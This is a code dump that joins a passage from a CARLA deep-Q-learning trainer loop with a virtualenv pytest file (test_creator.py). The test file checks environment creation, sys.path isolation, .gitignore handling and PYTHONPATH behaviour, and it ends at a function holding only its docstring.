        os.environ["CUDA_VISIBLE_DEVICES"] = str(settings.TRAINER_GPU)

    # Fixed seeds for reproducibility
    tf.set_random_seed(1)
    random.seed(1)
    np.random.seed(1)

    # Memory fraction
    gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=settings.TRAINER_MEMORY_FRACTION)
    backend.set_session(tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)))

    # Create trainer, run second init method and initialize weights so agents can load them
    trainer = ARTDQNTrainer(model_path)
    trainer.init2(stop, logdir, trainer_stats, episode, epsilon, discount, update_target_every, last_target_update, min_reward, agent_show_preview, save_checkpoint_every, seconds_per_episode, duration, optimizer, models, car_npcs)
    trainer.init_serialized_weights(weights, weights_iteration)
    trainer_stats[0] = TRAINER_STATE.waiting

    # Create training thread. We train in a separate thread so training won't block other things we do here
    trainer_thread = Thread(target=trainer.train_in_loop, daemon=True)
    trainer_thread.start()

    # Helper deques for stat averaging
    raw_rewards = deque(maxlen=settings.AGENTS*10)
    weighted_rewards = deque(maxlen=settings.AGENTS*10)
    episode_times = deque(maxlen=settings.AGENTS*10)
    frame_times = deque(maxlen=settings.AGENTS*2)
    configured_actions = [getattr(ACTIONS, action) for action in settings.ACTIONS]

    # Iterate over episodes until a 'stop' signal.
    # NOTE(review): the literal 3 presumably equals STOP.stopping (the value the
    # training thread sets on shutdown) - confirm and use the named constant.
    while stop.value != 3:

        # Update tensorboard step every episode
        if episode.value > trainer.tensorboard.step:
            trainer.tensorboard.step = episode.value

        # Load new transitions put here by agents and place them in the memory replay table
        for _ in range(transitions.qsize()):
            try:
                trainer.update_replay_memory(transitions.get(True, 0.1))
            except:
                break

        # Log stats in tensorboard - one queue entry per finished agent episode
        while not tensorboard_stats.empty():

            # Added to the Queue by agents; trailing items are flattened
            # (avg, std, usage) triples per action
            agent_episode, reward, agent_epsilon, episode_time, frame_time, weighted_reward, *avg_predicted_qs = tensorboard_stats.get_nowait()

            # Append to lists for averaging
            raw_rewards.append(reward)
            weighted_rewards.append(weighted_reward)
            episode_times.append(episode_time)
            frame_times.append(frame_time)

            # All monitored stats
            episode_stats[0] = min(raw_rewards)  # Minimum reward (raw)
            episode_stats[1] = sum(raw_rewards)/len(raw_rewards)  # Average reward (raw)
            episode_stats[2] = max(raw_rewards)  # Maximum reward (raw)
            episode_stats[3] = min(episode_times)  # Minimum episode duration
            episode_stats[4] = sum(episode_times)/len(episode_times)  # Average episode duration
            episode_stats[5] = max(episode_times)  # Maximum episode duration
            episode_stats[6] = sum(frame_times)/len(frame_times)  # Average agent FPS
            episode_stats[7] = min(weighted_rewards)  # Minimum reward (weighted)
            episode_stats[8] = sum(weighted_rewards)/len(weighted_rewards)  # Average reward (weighted)
            episode_stats[9] = max(weighted_rewards)  # Maximum reward (weighted)

            # Per-action Q stats; -10**6 is the sentinel for "no data".
            # Index 0 aggregates all actions, 1.. are individual actions.
            tensorboard_q_stats = {}
            for action, (avg_predicted_q, std_predicted_q, usage_predicted_q) in enumerate(zip(avg_predicted_qs[0::3], avg_predicted_qs[1::3], avg_predicted_qs[2::3])):
                if avg_predicted_q != -10**6:
                    episode_stats[action*3 + 10] = avg_predicted_q
                    tensorboard_q_stats[f'q_action_{action - 1}_{ACTIONS_NAMES[configured_actions[action - 1]]}_avg' if action else f'q_all_actions_avg'] = avg_predicted_q
                if std_predicted_q != -10 ** 6:
                    episode_stats[action*3 + 11] = std_predicted_q
                    tensorboard_q_stats[f'q_action_{action - 1}_{ACTIONS_NAMES[configured_actions[action - 1]]}_std' if action else f'q_all_actions_std'] = std_predicted_q
                if usage_predicted_q != -10 ** 6:
                    episode_stats[action*3 + 12] = usage_predicted_q
                    if action > 0:
                        tensorboard_q_stats[f'q_action_{action - 1}_{ACTIONS_NAMES[configured_actions[action - 1]]}_usage_pct'] = usage_predicted_q

            # Carla simulator stats; -1 marks "not set"
            carla_stats = {}
            for process_no in range(settings.CARLA_HOSTS_NO):
                for index, stat in enumerate(['carla_{}_car_npcs', 'carla_{}_weather_sun_azimuth', 'carla_{}_weather_sun_altitude', 'carla_{}_weather_clouds_pct', 'carla_{}_weather_wind_pct', 'carla_{}_weather_rain_pct']):
                    if carla_settings_stats[process_no][index] != -1:
                        carla_stats[stat.format(process_no+1)] = carla_settings_stats[process_no][index]
                carla_stats[f'carla_{process_no + 1}_fps'] = carla_fps[process_no].value

            # Save logs
            trainer.tensorboard.update_stats(step=agent_episode, reward_raw_avg=episode_stats[1], reward_raw_min=episode_stats[0], reward_raw_max=episode_stats[2], reward_weighted_avg=episode_stats[8], reward_weighted_min=episode_stats[7], reward_weighted_max=episode_stats[9], epsilon=agent_epsilon, episode_time_avg=episode_stats[4], episode_time_min=episode_stats[3], episode_time_max=episode_stats[5], agent_fps_avg=episode_stats[6], optimizer_lr=optimizer[0], optimizer_decay=optimizer[1], **tensorboard_q_stats, **carla_stats)

            # Save model, but only when min reward is greater or equal a set value
            if episode_stats[7] >= min_reward.value:
                trainer.save_model = f'models/{settings.MODEL_NAME}__{episode_stats[2]:_>7.2f}max_{episode_stats[1]:_>7.2f}avg_{episode_stats[0]:_>7.2f}min__{int(time.time())}.model'

        time.sleep(0.01)

    # End of training, wait for trainer thread to finish
    trainer_thread.join()
    trainer_stats[0] = TRAINER_STATE.finished
|
test_creator.py | from __future__ import absolute_import, unicode_literals
import ast
import difflib
import gc
import json
import logging
import os
import shutil
import site
import stat
import subprocess
import sys
import zipfile
from collections import OrderedDict
from itertools import product
from stat import S_IREAD, S_IRGRP, S_IROTH
from textwrap import dedent
from threading import Thread
import pytest
from virtualenv.__main__ import run, run_with_catch
from virtualenv.create.creator import DEBUG_SCRIPT, Creator, get_env_debug_info
from virtualenv.create.pyenv_cfg import PyEnvCfg
from virtualenv.create.via_global_ref.builtin.cpython.cpython2 import CPython2PosixBase
from virtualenv.create.via_global_ref.builtin.cpython.cpython3 import CPython3Posix
from virtualenv.create.via_global_ref.builtin.python2.python2 import Python2
from virtualenv.discovery.py_info import PythonInfo
from virtualenv.info import IS_PYPY, IS_WIN, PY2, PY3, fs_is_case_sensitive
from virtualenv.run import cli_run, session_via_cli
from virtualenv.util.path import Path
from virtualenv.util.six import ensure_str, ensure_text
CURRENT = PythonInfo.current_system()
def test_os_path_sep_not_allowed(tmp_path, capsys):
    """A destination containing os.pathsep must be rejected with a clear error."""
    bad_dest = str(tmp_path / "a{}b".format(os.pathsep))
    expected = (
        "destination {!r} must not contain the path separator ({}) as this"
        " would break the activation scripts".format(bad_dest, os.pathsep)
    )
    err = _non_success_exit_code(capsys, bad_dest)
    assert expected in err, err
def _non_success_exit_code(capsys, target):
    """Run virtualenv against `target`, assert it fails, and return its stderr."""
    with pytest.raises(SystemExit) as context:
        run_with_catch(args=[target])
    # a non-zero exit code signals the failure to the shell
    assert context.value.code != 0
    out, err = capsys.readouterr()
    # run_with_catch reports the SystemExit on stdout
    assert "SystemExit: " in out
    return err
def test_destination_exists_file(tmp_path, capsys):
    """Creating into a path that is an existing *file* must fail."""
    existing = tmp_path / "out"
    existing.write_text("")
    expected = "the destination {} already exists and is a file".format(str(existing))
    err = _non_success_exit_code(capsys, str(existing))
    assert expected in err, err
@pytest.mark.skipif(sys.platform == "win32", reason="Windows only applies R/O to files")
def test_destination_not_write_able(tmp_path, capsys):
    """Creating inside a read-only directory must fail with a helpful message."""
    if hasattr(os, "geteuid"):
        if os.geteuid() == 0:
            pytest.skip("no way to check permission restriction when running under root")
    target = tmp_path
    # remember the mode so the fixture directory can be restored afterwards
    prev_mod = target.stat().st_mode
    target.chmod(S_IREAD | S_IRGRP | S_IROTH)
    try:
        err = _non_success_exit_code(capsys, str(target))
        msg = "the destination . is not write-able at {}".format(str(target))
        assert msg in err, err
    finally:
        # always restore permissions so pytest can clean up tmp_path
        target.chmod(prev_mod)
def cleanup_sys_path(paths):
    """Normalize *paths* to resolved existing Paths and drop entries injected by
    the test runner / PyCharm helpers, keeping only "real" sys.path entries."""
    from virtualenv.create.creator import HERE

    resolved = []
    for raw in paths:
        candidate = Path(os.path.abspath(raw))
        if candidate.exists():
            resolved.append(candidate.resolve())

    to_remove = [Path(HERE)]
    if os.environ.get(str("PYCHARM_HELPERS_DIR")):
        to_remove.append(Path(os.environ[str("PYCHARM_HELPERS_DIR")]).parent)
        to_remove.append(Path(os.path.expanduser("~")) / ".PyCharm")

    prefixes = [str(entry) for entry in to_remove]
    return [p for p in resolved if not any(str(p).startswith(prefix) for prefix in prefixes)]
@pytest.fixture(scope="session")
def system(session_app_data):
    """Debug info (sys.path etc.) of the host interpreter, computed once per session."""
    return get_env_debug_info(Path(CURRENT.system_executable), DEBUG_SCRIPT, session_app_data, os.environ)
# Creator keys supported by the current interpreter; "builtin" is excluded as it
# is an alias for one of the concrete creators.
CURRENT_CREATORS = list(i for i in CURRENT.creators().key_to_class.keys() if i != "builtin")
# (creator_key, install_method) pairs used to parametrize the creation tests.
CREATE_METHODS = []
for k, v in CURRENT.creators().key_to_meta.items():
    if k in CURRENT_CREATORS:
        if v.can_copy:
            CREATE_METHODS.append((k, "copies"))
        if v.can_symlink:
            CREATE_METHODS.append((k, "symlinks"))
# PyPy 3.6.9 at PyPy version 7.3.0 on Linux has a known venv-with-copies bug.
# Bug fix: the original compared pypy_version_info[0:2] (a two-element slice)
# against the three-element list [7, 3, 0], which can never be equal, so the
# xfail marker guarded by this flag never fired; the slice is now [0:3].
_VENV_BUG_ON = (
    IS_PYPY
    and CURRENT.version_info[0:3] == (3, 6, 9)
    and CURRENT.pypy_version_info[0:3] == [7, 3, 0]
    and CURRENT.platform == "linux"
)
@pytest.mark.parametrize(
    "creator, isolated",
    [
        pytest.param(
            *i,
            marks=pytest.mark.xfail(
                reason="https://bitbucket.org/pypy/pypy/issues/3159/pypy36-730-venv-fails-with-copies-on-linux",
                strict=True,
            )
        )
        if _VENV_BUG_ON and i[0][0] == "venv" and i[0][1] == "copies"
        else i
        for i in product(CREATE_METHODS, ["isolated", "global"])
    ],
    ids=lambda i: "-".join(i) if isinstance(i, tuple) else i,
)
def test_create_no_seed(python, creator, isolated, system, coverage_env, special_name_dir):
    """End-to-end creation test without seeding: create a venv with every
    (creator, method, isolation) combination and verify its layout, sys.path,
    executables and .gitignore."""
    if creator[0] == "venv" and sys.version_info[0:2] == (3, 4):  # venv on python3.4 only supports ascii chars
        special_name_dir = special_name_dir.with_name(special_name_dir.name.encode("ascii", errors="ignore").decode())
    dest = special_name_dir
    creator_key, method = creator
    cmd = [
        "-v",
        "-v",
        "-p",
        ensure_text(python),
        ensure_text(str(dest)),
        "--without-pip",
        "--activators",
        "",
        "--creator",
        creator_key,
        "--{}".format(method),
    ]
    if isolated == "global":
        cmd.append("--system-site-packages")
    result = cli_run(cmd)
    creator = result.creator
    coverage_env()
    if IS_PYPY:
        # pypy cleans up file descriptors periodically so our (many) subprocess calls impact file descriptor limits
        # force a close of these on systems where the limit is low-ish (e.g. MacOS 256)
        gc.collect()
    # purelib must contain nothing beyond the _virtualenv patch files
    purelib = creator.purelib
    patch_files = {purelib / "{}.{}".format("_virtualenv", i) for i in ("py", "pyc", "pth")}
    patch_files.add(purelib / "__pycache__")
    content = set(creator.purelib.iterdir()) - patch_files
    assert not content, "\n".join(ensure_text(str(i)) for i in content)
    assert creator.env_name == ensure_text(dest.name)
    debug = creator.debug
    assert "exception" not in debug, "{}\n{}\n{}".format(debug.get("exception"), debug.get("out"), debug.get("err"))
    sys_path = cleanup_sys_path(debug["sys"]["path"])
    system_sys_path = cleanup_sys_path(system["sys"]["path"])
    our_paths = set(sys_path) - set(system_sys_path)
    our_paths_repr = "\n".join(ensure_text(repr(i)) for i in our_paths)
    # ensure we have at least one extra path added
    assert len(our_paths) >= 1, our_paths_repr
    # ensure all additional paths are related to the virtual environment
    for path in our_paths:
        msg = "\n{}\ndoes not start with {}\nhas:\n{}".format(
            ensure_text(str(path)),
            ensure_text(str(dest)),
            "\n".join(ensure_text(str(p)) for p in system_sys_path),
        )
        assert str(path).startswith(str(dest)), msg
    # ensure there's at least a site-packages folder as part of the virtual environment added
    assert any(p for p in our_paths if p.parts[-1] == "site-packages"), our_paths_repr
    # ensure the global site package is added or not, depending on flag
    global_sys_path = system_sys_path[-1]
    if isolated == "isolated":
        msg = "global sys path {} is in virtual environment sys path:\n{}".format(
            ensure_text(str(global_sys_path)),
            "\n".join(ensure_text(str(j)) for j in sys_path),
        )
        assert global_sys_path not in sys_path, msg
    else:
        common = []
        for left, right in zip(reversed(system_sys_path), reversed(sys_path)):
            if left == right:
                common.append(left)
            else:
                break

        def list_to_str(iterable):
            return [ensure_text(str(i)) for i in iterable]

        assert common, "\n".join(difflib.unified_diff(list_to_str(sys_path), list_to_str(system_sys_path)))
    # test that the python executables in the bin directory are either:
    # - files
    # - absolute symlinks outside of the venv
    # - relative symlinks inside of the venv
    if sys.platform == "win32":
        exes = ("python.exe",)
    else:
        exes = ("python", "python{}".format(*sys.version_info), "python{}.{}".format(*sys.version_info))
        if creator_key == "venv":
            # for venv some repackaging does not include the pythonx.y
            exes = exes[:-1]
    for exe in exes:
        exe_path = creator.bin_dir / exe
        assert exe_path.exists(), "\n".join(str(i) for i in creator.bin_dir.iterdir())
        if not exe_path.is_symlink():  # option 1: a real file
            continue  # it was a file
        link = os.readlink(str(exe_path))
        if not os.path.isabs(link):  # option 2: a relative symlink
            continue
        # option 3: an absolute symlink, should point outside the venv
        assert not link.startswith(str(creator.dest))
    if IS_WIN and CURRENT.implementation == "CPython":
        python_w = creator.exe.parent / "pythonw.exe"
        assert python_w.exists()
        assert python_w.read_bytes() != creator.exe.read_bytes()
    if CPython3Posix.pyvenv_launch_patch_active(PythonInfo.from_exe(python)) and creator_key != "venv":
        result = subprocess.check_output(
            [str(creator.exe), "-c", 'import os; print(os.environ.get("__PYVENV_LAUNCHER__"))'],
            universal_newlines=True,
        ).strip()
        assert result == "None"
    if isinstance(creator, CPython2PosixBase):
        make_file = debug["makefile_filename"]
        assert os.path.exists(make_file)
    git_ignore = (dest / ".gitignore").read_text()
    assert git_ignore.splitlines() == ["# created by virtualenv automatically", "*"]
def test_create_vcs_ignore_exists(tmp_path):
    """A pre-existing .gitignore in the destination must be left untouched."""
    ignore_file = tmp_path / ".gitignore"
    ignore_file.write_text("magic")
    cli_run([str(tmp_path), "--without-pip", "--activators", ""])
    assert ignore_file.read_text() == "magic"
def test_create_vcs_ignore_override(tmp_path):
    """With --no-vcs-ignore no .gitignore is generated at all."""
    ignore_file = tmp_path / ".gitignore"
    cli_run([str(tmp_path), "--without-pip", "--no-vcs-ignore", "--activators", ""])
    assert not ignore_file.exists()
def test_create_vcs_ignore_exists_override(tmp_path):
    """--no-vcs-ignore must also leave a pre-existing .gitignore untouched."""
    ignore_file = tmp_path / ".gitignore"
    ignore_file.write_text("magic")
    cli_run([str(tmp_path), "--without-pip", "--no-vcs-ignore", "--activators", ""])
    assert ignore_file.read_text() == "magic"
@pytest.mark.skipif(not CURRENT.has_venv, reason="requires interpreter with venv")
def test_venv_fails_not_inline(tmp_path, capsys, mocker):
    """When the venv creator cannot run inline (read-only pyvenv.cfg forces the
    subprocess path) a failing subprocess must surface as a non-zero exit with
    diagnostics on stdout/stderr."""
    if hasattr(os, "geteuid"):
        if os.geteuid() == 0:
            pytest.skip("no way to check permission restriction when running under root")

    def _session_via_cli(args, options=None, setup_logging=True, env=None):
        # wrap the real factory to assert the creator indeed cannot run inline
        session = session_via_cli(args, options, setup_logging, env)
        assert session.creator.can_be_inline is False
        return session

    mocker.patch("virtualenv.run.session_via_cli", side_effect=_session_via_cli)
    before = tmp_path.stat().st_mode
    cfg_path = tmp_path / "pyvenv.cfg"
    cfg_path.write_text(ensure_text(""))
    cfg = str(cfg_path)
    try:
        # make pyvenv.cfg read-only so the venv creator's write fails
        os.chmod(cfg, stat.S_IREAD | stat.S_IRGRP | stat.S_IROTH)
        cmd = ["-p", str(CURRENT.executable), str(tmp_path), "--without-pip", "--creator", "venv"]
        with pytest.raises(SystemExit) as context:
            run(cmd)
        assert context.value.code != 0
    finally:
        # restore permissions so pytest can clean up
        os.chmod(cfg, before)
    out, err = capsys.readouterr()
    assert "subprocess call failed for" in out, out
    assert "Error:" in err, err
@pytest.mark.skipif(not sys.version_info[0] == 2, reason="python 2 only tests")
def test_debug_bad_virtualenv(tmp_path):
    """If the venv's site.py is broken, creator.debug must capture the failure
    (return code, stdout, stderr and the exception) instead of blowing up."""
    cmd = [str(tmp_path), "--without-pip"]
    result = cli_run(cmd)
    # if the site.py is removed/altered the debug should fail as no one is around to fix the paths
    site_py = result.creator.stdlib / "site.py"
    site_py.unlink()
    # insert something that writes something on the stdout
    site_py.write_text('import sys; sys.stdout.write(repr("std-out")); sys.stderr.write("std-err"); raise ValueError')
    debug_info = result.creator.debug
    assert debug_info["returncode"]
    assert debug_info["err"].startswith("std-err")
    assert "std-out" in debug_info["out"]
    assert debug_info["exception"]
@pytest.mark.parametrize("creator", CURRENT_CREATORS)
@pytest.mark.parametrize("clear", [True, False], ids=["clear", "no_clear"])
def test_create_clear_resets(tmp_path, creator, clear, caplog):
    """--clear must wipe the destination before re-creating; without it the
    destination's extra files survive a second run."""
    caplog.set_level(logging.DEBUG)
    if creator == "venv" and clear is False:
        pytest.skip("venv without clear might fail")
    marker = tmp_path / "magic"
    cmd = [str(tmp_path), "--seeder", "app-data", "--without-pip", "--creator", creator, "-vvv"]
    cli_run(cmd)

    marker.write_text("")  # if we add a marker file this should be gone on a clear run, remain otherwise
    assert marker.exists()

    cli_run(cmd + (["--clear"] if clear else []))
    assert marker.exists() is not clear
@pytest.mark.parametrize("creator", CURRENT_CREATORS)
@pytest.mark.parametrize("prompt", [None, "magic"])
def test_prompt_set(tmp_path, creator, prompt):
    """--prompt must be written into pyvenv.cfg; with no flag no prompt key appears."""
    cmd = [str(tmp_path), "--seeder", "app-data", "--without-pip", "--creator", creator]
    if prompt is not None:
        cmd.extend(["--prompt", "magic"])
    result = cli_run(cmd)
    actual_prompt = tmp_path.name if prompt is None else prompt
    cfg = PyEnvCfg.from_file(result.creator.pyenv_cfg.path)
    if prompt is None:
        assert "prompt" not in cfg
    else:
        # the stdlib venv creator handles the prompt itself, so only check others
        if creator != "venv":
            assert "prompt" in cfg, list(cfg.content.keys())
            assert cfg["prompt"] == actual_prompt
@pytest.mark.slow
def test_cross_major(cross_python, coverage_env, tmp_path, session_app_data, current_fastest):
    """Creating a venv for a different Python major version must produce pip
    scripts named for the *target* version and a venv of that version."""
    cmd = [
        "-p",
        ensure_text(cross_python.executable),
        ensure_text(str(tmp_path)),
        "--no-setuptools",
        "--no-wheel",
        "--activators",
        "",
    ]
    result = cli_run(cmd)
    # pip console scripts must carry the target interpreter's version suffixes
    pip_scripts = {i.name.replace(".exe", "") for i in result.creator.script_dir.iterdir() if i.name.startswith("pip")}
    major, minor = cross_python.version_info[0:2]
    assert pip_scripts == {
        "pip",
        "pip{}".format(major),
        "pip-{}.{}".format(major, minor),
        "pip{}.{}".format(major, minor),
    }
    coverage_env()
    env = PythonInfo.from_exe(str(result.creator.exe), session_app_data)
    assert env.version_info.major != CURRENT.version_info.major
def test_create_parallel(tmp_path, monkeypatch, temp_app_data):
    """Several virtualenv creations may run concurrently without clashing."""
    def spawn(count):
        subprocess.check_call(
            [sys.executable, "-m", "virtualenv", "-vvv", str(tmp_path / "venv{}".format(count)), "--without-pip"],
        )

    workers = [Thread(target=spawn, args=(index,)) for index in range(1, 4)]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
def test_creator_input_passed_is_abs(tmp_path, monkeypatch):
    """A relative destination is resolved against the current working directory."""
    monkeypatch.chdir(tmp_path)
    validated = Creator.validate_dest("venv")
    assert str(tmp_path / "venv") == str(validated)
@pytest.mark.skipif(os.altsep is None, reason="OS does not have an altsep")
def test_creator_replaces_altsep_in_dest(tmp_path):
    """os.altsep occurrences in the destination are normalized to os.sep."""
    template = str(tmp_path / "venv{}foobar")
    validated = Creator.validate_dest(template.format(os.altsep))
    assert str(validated) == template.format(os.sep)
def test_create_long_path(current_fastest, tmp_path):
    """Console scripts must still run when the venv path approaches the
    platform's shebang length limit."""
    if sys.platform == "darwin":
        max_shebang_length = 512
    else:
        max_shebang_length = 127
    # filenames can be at most 255 long on macOS, so split to to levels
    remaining = max_shebang_length - len(str(tmp_path))
    folder = tmp_path / ("a" * (remaining // 2)) / ("b" * (remaining // 2)) / "c"
    folder.mkdir(parents=True)

    outcome = cli_run([str(folder)])
    subprocess.check_call([str(outcome.creator.script("pip")), "--version"])
@pytest.mark.parametrize("creator", sorted(set(PythonInfo.current_system().creators().key_to_class) - {"builtin"}))
def test_create_distutils_cfg(creator, tmp_path, monkeypatch, session_app_data):
    """A project-level setup.cfg [install] section with custom prefixes must not
    break installs into the venv: scripts and packages still land in the venv."""
    result = cli_run([ensure_text(str(tmp_path / "venv")), "--activators", "", "--creator", creator])

    app = Path(__file__).parent / "console_app"
    dest = tmp_path / "console_app"
    shutil.copytree(str(app), str(dest))

    setup_cfg = dest / "setup.cfg"
    conf = dedent(
        """
        [install]
        prefix={0}{1}prefix
        install_purelib={0}{1}purelib
        install_platlib={0}{1}platlib
        install_headers={0}{1}headers
        install_scripts={0}{1}scripts
        install_data={0}{1}data
        """.format(
            tmp_path,
            os.sep,
        ),
    )
    setup_cfg.write_text(setup_cfg.read_text() + conf)

    monkeypatch.chdir(dest)  # distutils will read the setup.cfg from the cwd, so change to that
    install_demo_cmd = [
        str(result.creator.script("pip")),
        "--disable-pip-version-check",
        "install",
        str(dest),
        "--no-use-pep517",
        "-vv",
    ]
    subprocess.check_call(install_demo_cmd)

    magic = result.creator.script("magic")  # console scripts are created in the right location
    assert magic.exists()

    package_folder = result.creator.purelib / "demo"  # prefix is set to the virtualenv prefix for install
    assert package_folder.exists(), list_files(str(tmp_path))
def list_files(path):
    """Return a tree-style listing of *path*, used in assertion failure messages.

    Walks the directory recursively; each directory is printed with a trailing
    slash, and its files are indented one extra level below it.
    """
    result = ""
    for root, _, files in os.walk(path):
        # Use a slice rather than str.replace: replace() would also rewrite
        # any repeated occurrence of the prefix deeper inside the path.
        level = root[len(path):].count(os.sep)
        indent = " " * 4 * level
        result += "{}{}/\n".format(indent, os.path.basename(root))
        sub = " " * 4 * (level + 1)
        for f in files:
            result += "{}{}\n".format(sub, f)
    return result
@pytest.mark.parametrize("python_path_on", [True, False], ids=["on", "off"])
@pytest.mark.skipif(PY3, reason="we rewrite sys.path only on PY2")
def test_python_path(monkeypatch, tmp_path, python_path_on):
    """PYTHONPATH entries must be honored (prepended) by the PY2 venv interpreter.

    With ``-E`` (python_path_on=False) the environment variable is ignored and
    sys.path matches the baseline; without it, every PYTHONPATH entry appears
    (absolutized, de-duplicated, order preserved) at the front of sys.path.
    """
    result = cli_run([ensure_text(str(tmp_path)), "--without-pip", "--activators", ""])
    monkeypatch.chdir(tmp_path)
    case_sensitive = fs_is_case_sensitive()

    def _get_sys_path(flag=None):
        # Query sys.path of the created interpreter as JSON (lower-cased on
        # case-insensitive file systems so comparisons are stable).
        cmd = [str(result.creator.exe)]
        if flag:
            cmd.append(flag)
        cmd.extend(["-c", "import json; import sys; print(json.dumps(sys.path))"])
        return [i if case_sensitive else i.lower() for i in json.loads(subprocess.check_output(cmd))]

    monkeypatch.delenv(str("PYTHONPATH"), raising=False)
    base = _get_sys_path()
    # note the value result.creator.interpreter.system_stdlib cannot be set, as that would disable our custom site.py
    python_paths = [
        str(Path(result.creator.interpreter.prefix)),
        str(Path(result.creator.interpreter.system_stdlib) / "b"),
        str(result.creator.purelib / "a"),
        str(result.creator.purelib),
        str(result.creator.bin_dir),
        str(tmp_path / "base"),
        str(tmp_path / "base_sep") + os.sep,
        "name",
        "name{}".format(os.sep),
        str(tmp_path.parent / (ensure_text(tmp_path.name) + "_suffix")),
        ".",
        "..",
        "",
    ]
    python_path_env = os.pathsep.join(ensure_str(i) for i in python_paths)
    monkeypatch.setenv(str("PYTHONPATH"), python_path_env)
    extra_all = _get_sys_path(None if python_path_on else "-E")
    if python_path_on:
        assert extra_all[0] == ""  # the cwd is always injected at start as ''
        extra_all = extra_all[1:]
        assert base[0] == ""
        base = base[1:]
        assert not (set(base) - set(extra_all))  # all base paths are present
        # PYTHONPATH entries are absolutized and de-duplicated, order preserved.
        abs_python_paths = list(OrderedDict((os.path.abspath(ensure_text(i)), None) for i in python_paths).keys())
        abs_python_paths = [i if case_sensitive else i.lower() for i in abs_python_paths]
        extra_as_python_path = extra_all[: len(abs_python_paths)]
        assert abs_python_paths == extra_as_python_path  # python paths are there at the start
        non_python_path = extra_all[len(abs_python_paths) :]
        assert non_python_path == [i for i in base if i not in extra_as_python_path]
    else:
        assert base == extra_all
@pytest.mark.skipif(
    not (CURRENT.implementation == "CPython" and PY2),
    reason="stdlib components without py files only possible on CPython2",
)
@pytest.mark.parametrize(
    "py, pyc",
    list(
        product(
            [True, False] if Python2.from_stdlib(Python2.mappings(CURRENT), "os.py")[2] else [False],
            [True, False] if Python2.from_stdlib(Python2.mappings(CURRENT), "os.pyc")[2] else [False],
        ),
    ),
)
def test_py_pyc_missing(tmp_path, mocker, session_app_data, py, pyc):
    """Ensure that creation can succeed if os.pyc exists (even if os.py has been deleted)"""
    previous = Python2.from_stdlib

    def from_stdlib(mappings, name):
        # Pretend os.py / os.pyc exist (or not) according to the parameters.
        path, to, exists = previous(mappings, name)
        if name.endswith("py"):
            exists = py
        elif name.endswith("pyc"):
            exists = pyc
        return path, to, exists

    mocker.patch.object(Python2, "from_stdlib", side_effect=from_stdlib)
    result = cli_run([ensure_text(str(tmp_path)), "--without-pip", "--activators", "", "-vv"])
    py_at = Python2.from_stdlib(Python2.mappings(CURRENT), "os.py")[1](result.creator, Path("os.py"))
    py = pyc is False or py  # if pyc is False we fallback to serve the py, which will exist (as we only mock the check)
    assert py_at.exists() is py
    # BUG FIX: the lookup key was "osc.py", which is not a stdlib mapping name;
    # mirror the "os.py" lookup above (and the parametrize) and use "os.pyc".
    pyc_at = Python2.from_stdlib(Python2.mappings(CURRENT), "os.pyc")[1](result.creator, Path("os.pyc"))
    assert pyc_at.exists() is pyc
def test_zip_importer_can_import_setuptools(tmp_path):
    """We're patching the loaders so might fail on r/o loaders, such as zipimporter on CPython<3.8"""
    result = cli_run([str(tmp_path / "venv"), "--activators", "", "--no-pip", "--no-wheel", "--copies"])
    zip_path = tmp_path / "site-packages.zip"
    with zipfile.ZipFile(str(zip_path), "w", zipfile.ZIP_DEFLATED) as zip_handler:
        lib = str(result.creator.purelib)
        for root, _, files in os.walk(lib):
            # BUG FIX: strip the path separator (os.sep), not the environment
            # list separator (os.pathsep), to make the archive names relative.
            base = root[len(lib) :].lstrip(os.sep)
            for file in files:
                if not file.startswith("_virtualenv"):
                    zip_handler.write(filename=os.path.join(root, file), arcname=os.path.join(base, file))
    # Remove the on-disk site-packages content so imports must come from the zip.
    for folder in result.creator.purelib.iterdir():
        if not folder.name.startswith("_virtualenv"):
            if folder.is_dir():
                shutil.rmtree(str(folder), ignore_errors=True)
            else:
                folder.unlink()
    env = os.environ.copy()
    env[str("PYTHONPATH")] = str(zip_path)
    subprocess.check_call([str(result.creator.exe), "-c", "from setuptools.dist import Distribution"], env=env)
# verify that python in created virtualenv does not preimport threading.
# https://github.com/pypa/virtualenv/issues/1895
#
# coverage is disabled, because when coverage is active, it imports threading in default mode.
@pytest.mark.xfail(
    IS_PYPY and PY3 and sys.platform.startswith("darwin"),
    reason="https://foss.heptapod.net/pypy/pypy/-/issues/3269",
)
def test_no_preimport_threading(tmp_path, no_coverage):
    """The interpreter of a fresh venv must not import ``threading`` at startup."""
    session = cli_run([ensure_text(str(tmp_path))])
    dump_modules = r"import sys; print('\n'.join(sorted(sys.modules)))"
    out = subprocess.check_output(
        [str(session.creator.exe), "-c", dump_modules],
        universal_newlines=True,
    )
    assert "threading" not in set(out.splitlines())
# verify that .pth files in site-packages/ are always processed even if $PYTHONPATH points to it.
def test_pth_in_site_vs_PYTHONPATH(tmp_path):
    """A .pth in site-packages runs both with and without PYTHONPATH pointing there."""
    session = cli_run([ensure_text(str(tmp_path))])
    site_packages = str(session.creator.purelib)
    # install test.pth that sets sys.testpth='ok'
    with open(os.path.join(site_packages, "test.pth"), "w") as f:
        f.write('import sys; sys.testpth="ok"\n')

    def run_probe(env=None):
        # Ask the venv interpreter what sys.testpth ended up as.
        return subprocess.check_output(
            [str(session.creator.exe), "-c", r"import sys; print(sys.testpth)"],
            universal_newlines=True,
            env=env,
        )

    # verify that test.pth is activated when interpreter is run
    assert run_probe() == "ok\n"
    # same with $PYTHONPATH pointing to site_packages
    env = os.environ.copy()
    path = [site_packages]
    if "PYTHONPATH" in env:
        path.append(env["PYTHONPATH"])
    env["PYTHONPATH"] = os.pathsep.join(path)
    assert run_probe(env) == "ok\n"
def test_getsitepackages_system_site(tmp_path):
    """site.getsitepackages() lists system paths only with --system-site-packages."""

    def venv_site_packages(session):
        out = subprocess.check_output(
            [str(session.creator.exe), "-c", r"import site; print(site.getsitepackages())"],
            universal_newlines=True,
        )
        return ast.literal_eval(out)

    # Test without --system-site-packages
    session = cli_run([ensure_text(str(tmp_path))])
    expected = get_expected_system_site_packages(session)
    reported = venv_site_packages(session)
    for candidate in expected:
        assert candidate not in reported
    # Test with --system-site-packages
    session = cli_run([ensure_text(str(tmp_path)), "--system-site-packages"])
    expected = get_expected_system_site_packages(session)
    reported = venv_site_packages(session)
    for candidate in expected:
        assert candidate in reported
def get_expected_system_site_packages(session):
    """Compute the system interpreter's site-packages for *session*'s base python.

    Temporarily points ``site.PREFIXES`` at the venv's recorded base prefixes so
    ``site.getsitepackages()`` reports the system locations, then restores it.
    """
